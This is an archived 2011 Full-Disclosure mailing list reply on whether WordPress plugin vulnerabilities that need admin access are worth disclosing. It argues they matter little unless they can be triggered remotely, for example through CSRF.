[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] Question about disclosure of WordPress plugin
From:       Andrew Farmer <andfarm () gmail ! com>
Date:       2011-08-29 20:07:55
Message-ID: 8EC6C8F4-AD35-420F-982E-54C9401B8E6B () gmail ! com
[Download RAW message or body]

On 2011-08-26, at 05:08, Miroslav Stampar wrote:
> Does anybody know what's the general opinion on disclosure of
> WordPress plugin vulnerabilities in these two sections:
<...>
> 2) admin ones (requires access to the restricted admin area)

If you need full admin access to run the exploit, you probably have enough access that you \
could get arbitrary code execution by installing a plugin, like:

http://wordpress.org/extend/plugins/wordpress-console/

So the "exploit" isn't really doing much at that point, unless it can be triggered remotely \
(e.g, CSRF). _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]